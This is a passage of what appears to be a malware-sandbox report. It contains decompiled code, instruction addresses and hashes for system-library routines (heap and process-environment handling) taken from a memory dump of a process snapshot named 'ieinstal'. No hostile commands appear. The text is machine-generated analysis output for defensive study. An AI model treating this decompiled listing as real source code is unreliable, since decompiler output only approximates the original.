										_t102 = E1ED32C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E1ED32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E1ED32C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E1ED32ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E1ED5D0D1(_t62);
				goto L28;
			}





















                        0x1ed32990
                        0x1ed32992
                        0x1ed32997
                        0x1ed329a3
                        0x1ed329a6
                        0x1ed329ab
                        0x1ed329ad
                        0x1ed329b2
                        0x1ed75c80
                        0x1ed329b8
                        0x1ed329b8
                        0x1ed329bb
                        0x1ed329c0
                        0x1ed329c5
                        0x1ed329c6
                        0x1ed329c6
                        0x1ed329cb
                        0x00000000
                        0x00000000
                        0x1ed329cd
                        0x1ed329d0
                        0x1ed329d9
                        0x1ed329db
                        0x1ed329dd
                        0x1ed32a7f
                        0x1ed32a84
                        0x1ed32a87
                        0x1ed32a89
                        0x1ed75ca1
                        0x1ed75ca3
                        0x00000000
                        0x1ed32a8f
                        0x1ed32a8f
                        0x00000000
                        0x1ed32a8f
                        0x00000000
                        0x1ed329e3
                        0x1ed329e3
                        0x1ed329e3
                        0x00000000
                        0x1ed329e3
                        0x1ed329dd
                        0x00000000
                        0x1ed329db
                        0x1ed329e6
                        0x1ed329e9
                        0x1ed329eb
                        0x1ed329ed
                        0x1ed329f3
                        0x1ed329f5
                        0x1ed329f8
                        0x1ed329fa
                        0x1ed32a97
                        0x1ed32a9a
                        0x1ed32a9d
                        0x1ed32add
                        0x00000000
                        0x1ed32a9f
                        0x1ed32aa2
                        0x1ed32aa5
                        0x1ed32aa8
                        0x1ed32aab
                        0x1ed75cab
                        0x1ed75caf
                        0x1ed75cc5
                        0x1ed75cda
                        0x1ed75cdc
                        0x1ed75cdf
                        0x1ed75ce5
                        0x00000000
                        0x1ed75ceb
                        0x1ed75ced
                        0x1ed75cee
                        0x00000000
                        0x1ed75cee
                        0x1ed75cb1
                        0x1ed75cb4
                        0x1ed75cb9
                        0x1ed75cbb
                        0x00000000
                        0x1ed75cbd
                        0x1ed75cbd
                        0x00000000
                        0x1ed75cbd
                        0x1ed75cbb
                        0x1ed32ab1
                        0x1ed32ab1
                        0x1ed32ac4
                        0x1ed32ac6
                        0x1ed32ac6
                        0x00000000
                        0x1ed32ac6
                        0x1ed32aab
                        0x00000000
                        0x1ed32a00
                        0x1ed32a09
                        0x1ed32a0e
                        0x1ed32a21
                        0x1ed32a24
                        0x1ed32a35
                        0x1ed32a3a
                        0x1ed32a3d
                        0x1ed32a42
                        0x1ed32a59
                        0x1ed32a59
                        0x1ed32a5c
                        0x1ed32a5f
                        0x1ed32a5f
                        0x1ed329fa
                        0x1ed329f3
                        0x1ed32a64
                        0x1ed32a64
                        0x1ed32a6b
                        0x1ed32a6b
                        0x1ed32a6d
                        0x1ed32a72
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64931cdf3c0a0612ca9204860f9b03be0be1e9c101efbbd3f6eb3622f930db2a
                        • Instruction ID: c558197fd41fab3ec42c9d13948383fdf5d49aa420ab23c9d4de7c149cbdc119
                        • Opcode Fuzzy Hash: 64931cdf3c0a0612ca9204860f9b03be0be1e9c101efbbd3f6eb3622f930db2a
                        • Instruction Fuzzy Hash: 9C5126B5D0025ADFCF15CF55C880ADEBBB6BF48B14F218655E810AB2A0C335D992CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED34D3B, Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E1ED34D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1edfd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E1ED4FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1edf7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E1ED4B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L1ED24620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E1ED0CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E1ED4B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E1ED4F380(_t67 + 0xc, 0x1ece5138, 0x10) == 0) {
								 *0x1edf60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E1ED34F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E1ED34E70(0x1edf86b0, 0x1ed35690, 0, 0) != 0) {
					_t46 = E1ED0CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                        0x1ed34d3b
                        0x1ed34d4d
                        0x1ed34d53
                        0x1ed34d58
                        0x1ed34d65
                        0x1ed34d6c
                        0x1ed34d71
                        0x1ed34d77
                        0x1ed34d7f
                        0x1ed34d8c
                        0x1ed34d8e
                        0x1ed34dad
                        0x1ed34db0
                        0x1ed34db7
                        0x1ed34db8
                        0x1ed34db9
                        0x1ed34dba
                        0x1ed34dbb
                        0x1ed34dc1
                        0x1ed34dc8
                        0x1ed34dcc
                        0x1ed34dd5
                        0x1ed34dde
                        0x1ed34ddf
                        0x1ed34de0
                        0x1ed34de1
                        0x1ed34de6
                        0x1ed34de7
                        0x1ed34de9
                        0x1ed34df3
                        0x00000000
                        0x00000000
                        0x1ed76c7c
                        0x1ed76c8a
                        0x1ed76c8a
                        0x1ed76c9d
                        0x1ed76ca7
                        0x1ed76cac
                        0x1ed76cb2
                        0x1ed76cb9
                        0x00000000
                        0x1ed76cbf
                        0x1ed76cbf
                        0x00000000
                        0x1ed76cbf
                        0x1ed76cb9
                        0x1ed34dfb
                        0x1ed76ccf
                        0x1ed76cd3
                        0x1ed34e32
                        0x1ed34e39
                        0x1ed76ce0
                        0x1ed76cf2
                        0x1ed76cf2
                        0x1ed76ce0
                        0x1ed34e3f
                        0x1ed34e41
                        0x1ed34e51
                        0x1ed34e51
                        0x1ed34e03
                        0x1ed34e03
                        0x1ed34e09
                        0x1ed34e0f
                        0x1ed34e57
                        0x00000000
                        0x00000000
                        0x1ed34e1b
                        0x1ed34e30
                        0x1ed34e5b
                        0x1ed34e5b
                        0x00000000
                        0x1ed34e30
                        0x1ed34e11
                        0x1ed34e11
                        0x1ed34e16
                        0x00000000
                        0x1ed34e16
                        0x1ed34e01
                        0x00000000
                        0x1ed34e01
                        0x1ed34da5
                        0x1ed76c6b
                        0x00000000
                        0x1ed34dab
                        0x1ed34dab
                        0x00000000
                        0x1ed34dab

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff9924f598ae8a0e8c2e36736c15c95c05429f0722c7f6e5e63f5451f29fbdd0
                        • Instruction ID: 185dbb796994c2aa7ac816c148612364be9dbac026f32a9131daec76ee35168f
                        • Opcode Fuzzy Hash: ff9924f598ae8a0e8c2e36736c15c95c05429f0722c7f6e5e63f5451f29fbdd0
                        • Instruction Fuzzy Hash: 11413BB9A003589FEB21CF10CC90F9AB7BAEF44315F1406AAE945A7380D774ED44CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED34BAD, Relevance: .1, Instructions: 131COMMON
                        Download Yara Rule
                        C-Code - Quality: 85%
                        			E1ED34BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1edfd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E1ED0CC50(_t86);
					L11:
					return E1ED4B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1edf8504
				E1ED22280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E1ED4FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E1ED4B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L1ED24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E1ED0CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1edf8504
								E1ED1FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E1ED34F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                        0x1ed34bad
                        0x1ed34bbf
                        0x1ed34bc2
                        0x1ed34bc6
                        0x1ed34bcd
                        0x1ed34bd9
                        0x1ed767fe
                        0x1ed76800
                        0x1ed34ccc
                        0x1ed34ccd
                        0x1ed34cb7
                        0x1ed34cc9
                        0x1ed34cc9
                        0x1ed34bdf
                        0x1ed34be5
                        0x00000000
                        0x00000000
                        0x1ed34beb
                        0x1ed34bef
                        0x00000000
                        0x00000000
                        0x1ed34bf5
                        0x1ed34bf9
                        0x1ed34c06
                        0x1ed34c0b
                        0x1ed34c17
                        0x1ed34c1c
                        0x1ed34c1f
                        0x1ed34c25
                        0x1ed34c33
                        0x1ed34c3d
                        0x1ed34c40
                        0x1ed34c43
                        0x1ed34c47
                        0x1ed34c4d
                        0x1ed34c53
                        0x1ed34c54
                        0x1ed34c55
                        0x1ed34c56
                        0x1ed34c5b
                        0x1ed34c5c
                        0x1ed34c63
                        0x1ed34c6b
                        0x00000000
                        0x00000000
                        0x1ed76776
                        0x1ed76784
                        0x1ed76784
                        0x1ed7679f
                        0x1ed767a7
                        0x1ed767af
                        0x1ed767ce
                        0x00000000
                        0x1ed767b1
                        0x1ed767b7
                        0x1ed767b8
                        0x1ed767c1
                        0x1ed767d3
                        0x1ed767d9
                        0x1ed767dd
                        0x1ed34c94
                        0x1ed34c94
                        0x1ed34c98
                        0x1ed34c9c
                        0x1ed34ca3
                        0x1ed767f4
                        0x1ed767f4
                        0x1ed34cb5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed34cb5
                        0x1ed34c79
                        0x1ed34c7e
                        0x1ed34c89
                        0x1ed34c8b
                        0x1ed34c8f
                        0x1ed34c8f
                        0x00000000
                        0x1ed34c89
                        0x1ed767c3
                        0x00000000
                        0x1ed767c3
                        0x1ed767af
                        0x1ed34c73
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92fcea280ba24a04396ca1ef567a127ca05e50ad4b6b44892d583b6606294c4a
                        • Instruction ID: 42d8c34ee0966e1f81f24fde59afa9d0904b681c9996df7e6cde9cc972d00aec
                        • Opcode Fuzzy Hash: 92fcea280ba24a04396ca1ef567a127ca05e50ad4b6b44892d583b6606294c4a
                        • Instruction Fuzzy Hash: B841F479E002689BCB20CF64C940FDE77B5EF45740F0106A5E909AB240DB75EE84CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDCAA16, Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1EDCAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E1EDCABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E1EDCAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E1EDCAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E1EDACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L1ED277F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E1ED27D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E1EDC131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E1EDACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                        0x1edcaa1f
                        0x1edcaa21
                        0x1edcaa23
                        0x1edcaa2b
                        0x1edcaa30
                        0x1edcaa36
                        0x1edcaa39
                        0x1edcaa42
                        0x1edcaa75
                        0x1edcaa7a
                        0x1edcaa7c
                        0x1edcaa7c
                        0x1edcaa88
                        0x1edcaa8a
                        0x1edcaa8f
                        0x1edcab02
                        0x1edcab04
                        0x1edcaa99
                        0x1edcaaa8
                        0x1edcaaaf
                        0x1edcaab3
                        0x1edcaacc
                        0x1edcaad1
                        0x1edcaad6
                        0x1edcaae0
                        0x1edcaaf3
                        0x1edcaaf9
                        0x1edcaafe
                        0x1edcaafe
                        0x1edcaaf3
                        0x1edcaad6
                        0x1edcaab3
                        0x1edcab07
                        0x1edcab0a
                        0x1edcab11
                        0x1edcab23
                        0x1edcab13
                        0x1edcab1c
                        0x1edcab1c
                        0x1edcab2b
                        0x1edcab44
                        0x1edcab44
                        0x1edcab51
                        0x1edcab51
                        0x1edcaa44
                        0x1edcaa47
                        0x1edcaa4c
                        0x00000000
                        0x00000000
                        0x1edcaa5a
                        0x1edcaa64
                        0x1edcaa72
                        0x00000000
                        0x1edcaa66
                        0x1edcaa66
                        0x1edcaa68
                        0x1edcaa6a
                        0x00000000
                        0x1edcaa6a

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 6f5ad9d01abca1ae57f34c614265c2024d7ca4ba4b0223d0b34a7205690cd341
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: 50310E76F002956BDB058A65C850BAFFBABEF802D0F11826DE902E7291DB70DD00CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED18A0A, Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E1ED18A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x1edfd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E1ED4B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E1ED1E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1ece1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E1ED31DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E1ED43C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E1ED18999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                        0x1ed18a0a
                        0x1ed18a1c
                        0x1ed18a23
                        0x1ed18a2e
                        0x1ed18a30
                        0x1ed18a36
                        0x1ed18a3c
                        0x1ed18a3e
                        0x1ed18a4a
                        0x1ed18a52
                        0x1ed18a9c
                        0x1ed18aae
                        0x1ed18a58
                        0x1ed18a5e
                        0x1ed18a6a
                        0x1ed18a6f
                        0x1ed18a75
                        0x1ed18a7d
                        0x1ed18a85
                        0x1ed18a86
                        0x1ed18a89
                        0x1ed18a93
                        0x1ed18a99
                        0x1ed18a9b
                        0x00000000
                        0x1ed18aaf
                        0x1ed18abe
                        0x1ed18ac3
                        0x1ed18acb
                        0x1ed18ad7
                        0x1ed18ae0
                        0x1ed18af1
                        0x00000000
                        0x1ed18af1
                        0x1ed18acd
                        0x1ed18ad5
                        0x1ed18afb
                        0x1ed18afd
                        0x1ed18aff
                        0x1ed18b07
                        0x1ed18b22
                        0x1ed18b24
                        0x1ed18b2a
                        0x1ed18b2e
                        0x1ed18b3f
                        0x1ed18b78
                        0x1ed18b41
                        0x1ed18b52
                        0x1ed18b54
                        0x1ed18b5c
                        0x1ed18b74
                        0x1ed18b74
                        0x1ed18b5c
                        0x1ed18b3f
                        0x1ed18b5e
                        0x1ed18b61
                        0x1ed18b64
                        0x1ed18b64
                        0x1ed18b6c
                        0x1ed18b6c
                        0x1ed18b11
                        0x1ed69cd5
                        0x1ed69cd5
                        0x1ed18b17
                        0x1ed18b1a
                        0x1ed18b1a
                        0x00000000
                        0x1ed18ad5
                        0x1ed18a89

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e710f782edf31772f3444948b3489b91f6ac6bed052bd6cd05f942bab38a65b6
                        • Instruction ID: 0f6020bbc49eb0805248808173cbbda51a8a8cb120a6c806fafa06f677805fa0
                        • Opcode Fuzzy Hash: e710f782edf31772f3444948b3489b91f6ac6bed052bd6cd05f942bab38a65b6
                        • Instruction Fuzzy Hash: EF4182B8A0026D9BDB24CF15E889AA9F7F5EB54300F1147E9D8189B241E770DE80CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDCFDE2, Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E1EDCFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E1EDCFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E1EDD0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E1ED27D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E1EDC1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E1EDD2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E1EDCC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E1EDCDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E1ED27D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E1EDCA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                        0x1edcfde7
                        0x1edcfde8
                        0x1edcfdec
                        0x1edcfdee
                        0x1edcfdf5
                        0x1edcfdf7
                        0x1edcfdfc
                        0x1edcfe19
                        0x1edcfe22
                        0x1edcfe26
                        0x1edcfec6
                        0x1edcfecd
                        0x1edcfed5
                        0x1edcfee7
                        0x1edcfed7
                        0x1edcfee0
                        0x1edcfee0
                        0x1edcfeef
                        0x1edcff00
                        0x1edcff02
                        0x1edcff07
                        0x1edcff07
                        0x00000000
                        0x1edcfeef
                        0x1edcfe33
                        0x1edcfe55
                        0x1edcfe59
                        0x1edcfe5b
                        0x1edcfe5e
                        0x1edcfe69
                        0x1edcfe6d
                        0x1edcfe6d
                        0x1edcfe69
                        0x1edcfe35
                        0x1edcfe41
                        0x1edcfe41
                        0x1edcfe79
                        0x1edcfe8b
                        0x1edcfe7b
